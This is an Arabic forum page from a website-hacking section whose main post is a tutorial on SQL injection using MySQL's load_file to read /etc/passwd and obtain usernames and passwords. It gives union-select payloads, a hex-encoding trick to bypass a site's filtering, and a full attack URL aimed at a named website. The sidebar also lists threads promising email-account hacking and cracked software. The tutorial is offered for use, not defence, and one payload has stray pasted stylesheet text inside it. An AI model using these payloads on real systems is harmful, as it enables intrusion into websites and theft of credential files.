وسط البلد ... حسين عبد الحميد
اهلا وسهلا بك عزيزى الزائر فى منتديا وسط البلد .حسين عبد الحميد
انت غير مشترك فى المنتدى
لاشترك اضغط كلمة سجل


welcome to منتدى وسط البلد
 
الرئيسيةمكتبة الصورس .و .جبحـثالأعضاءالمجموعاتالتسجيلدخول
اهلا بكم فى منتديات وسط البلد ادراة .. حسين عبد الحميد الاسيوطى
عزيزى الزائر تمتع معنا باحلى الاغانى الموسيقية مع راديو روتانا ودردش معنا فى اكبر تجمع عربى مع دردشة القهوة نحن دائما الافضـــــل ونريد مساهمتك معنا تحيات G.Manager.. حسين عبد الحميد
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
» ارخص ايجار ليموزين مصر التقل السياحى بكافه انواعه وكمالياته
الإثنين ديسمبر 29, 2014 12:35 pm من طرف امانى زين تورز

» عمره المولد النبوى الشريف 2015/1436 من زين تورز
الإثنين ديسمبر 29, 2014 12:25 pm من طرف امانى زين تورز

» افضل العروض السياحيه لرأس السنه باقل الاسعارواروع الاماكن
الإثنين ديسمبر 29, 2014 12:22 pm من طرف امانى زين تورز

» الفيلم الذى افزع الكثير Imago Mortis2009 مترجم للكبار فقط ليس لذو القلوب الضعيفه
الخميس سبتمبر 06, 2012 7:22 pm من طرف عباس المقداد

» هـل فعـلا نـحن جيــل فأشــــــــــل
الثلاثاء سبتمبر 04, 2012 6:26 pm من طرف عبدالله

» لسرقة الايميل بدون ارسال اي شئ بدون برامج
الثلاثاء يوليو 03, 2012 12:44 am من طرف عشقته بصمت

» Wink لعبة القطار الرائعه جدآ Rail Simulator النسخه كامله بالكيجن والكراك الحصري على اكثر من سيرفر فقط على ارض الاختلاف والتميز ماي ايجي
الأربعاء يوليو 27, 2011 2:23 am من طرف رضاابورمضان

» كتابي لاحتراف اختراق الايميلات
الإثنين مارس 14, 2011 11:01 am من طرف slavigne

» بدون برنامج بدون تبليغ اخترق اي ايميل في بالك
الإثنين مارس 14, 2011 10:58 am من طرف slavigne

ازرار التصفُّح
 البوابة
 الصفحة الرئيسية
 قائمة الاعضاء
 البيانات الشخصية
 س .و .ج
 بحـث
منتدى
التبادل الاعلاني
احداث منتدى مجاني
محرك بحث جوجول وسط البلد
منتديات وسط البلد
يهدف الى الترقى ومساعدة الاعضاء والزوار على الاطلال فى كل ما هوا جديد
تصويت
هـل فعـلا نـحن جيــل فأشــــــــــل
نحن الافضل ام جيلنا السابق
40%
 40% [ 2 ]
هل نحن حقا جيل فاشل ولا يمكننا الحصول على ما نريد
20%
 20% [ 1 ]
نحن حقا جيل فاشل والسبب انهم لايريدون فهمنا
40%
 40% [ 2 ]
مجموع عدد الأصوات : 5
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية digg  تسجيل صفحاتك المفضلة في مواقع خارجية delicious  تسجيل صفحاتك المفضلة في مواقع خارجية reddit  تسجيل صفحاتك المفضلة في مواقع خارجية stumbleupon  تسجيل صفحاتك المفضلة في مواقع خارجية slashdot  تسجيل صفحاتك المفضلة في مواقع خارجية yahoo  تسجيل صفحاتك المفضلة في مواقع خارجية google  تسجيل صفحاتك المفضلة في مواقع خارجية blogmarks  تسجيل صفحاتك المفضلة في مواقع خارجية live      

قم بحفض و مشاطرة الرابط WEST albald على موقع حفض الصفحات

قم بحفض و مشاطرة الرابط وسط البلد ... حسين عبد الحميد على موقع حفض الصفحات
يناير 2019
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
 123456
78910111213
14151617181920
21222324252627
28293031   
اليوميةاليومية

شاطر | 
 

 شـرح تحطي حماية الموقع باستعمال الامر load_file للحصول علي اليوزر والباسورد

اذهب الى الأسفل 
كاتب الموضوعرسالة
ماندو
عضو مميز
عضو مميز
ماندو


عدد المساهمات : 114
تاريخ التسجيل : 03/06/2010

مُساهمةموضوع: شـرح تحطي حماية الموقع باستعمال الامر load_file للحصول علي اليوزر والباسورد   الإثنين يونيو 14, 2010 4:31 pm




كان احد سألني عن امر load_file


واذا كان يريد يشفرو ا لان الموقع محمي


قلت بشرحة هنا لكي يستفيد الجميع


اول شئ بعد اكتشاف العمود المصاب


راح نروح مكان العمود المصاب


ونضع الامر تحميل الملف

كود:

load_file




مثلا

عندنا موقع مصاب ورقم العمود المصاب 5

نضع الامر مكان العمود 5

لاحضار اليوزر نيم + الباسورد


كود:

load_file('/etc/passwd')


كود:

id=-33 union select 1,2,3,4, <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:&quot;&quot;; margin:0in; margin-bottom:.0001pt; text-align:right; mso-pagination:widow-orphan; direction:rtl; unicode-bidi:embed; font-size:12.0pt; font-family:&quot;Times New Roman&quot;; mso-fareast-font-family:&quot;Times New Roman&quot;;} @page Section1 {size:8.5in 11.0in; margin:1.0in 1.25in 1.0in 1.25in; mso-header-margin:.5in; mso-footer-margin:.5in; mso-paper-source:0;} div.Section1 {page:Section1;} --> load_file('/etc/passwd') ,6,7,8,9 from user



اوك لاقينا الموقع محمي والحماية on

نروح نشفروا

نروح علي موقع

انا اختارت الموقع دا

اضغط هنا

نضع

كود:

etc/passwd

ونشفر
كود:

encode now

اوك طلع لنا الامر مشفر
MySql hex-encoded string
وهذا الامر

كود:

0x6574632f706173737764


كود:

load_file(0x6574632f706173737764)


زي ما واضح بالصورة





ونطبق

نلقي النتيجة تمامـ

مثال
كود:

http://dev-chat.com/vb/newthread.php?id=-33 union select 1,2,3,4,load_file(0x6574632f706173737764),6,7,8,9 from user--





الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
شـرح تحطي حماية الموقع باستعمال الامر load_file للحصول علي اليوزر والباسورد
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
وسط البلد ... حسين عبد الحميد :: منتــــــــدى الكمبيوتـــــــر :: قســـــــم برامج الكمبيوتر والانترنت :: منتدى اختراق المواقع والسيرفرات وحمايتها & وسط البلد-
انتقل الى: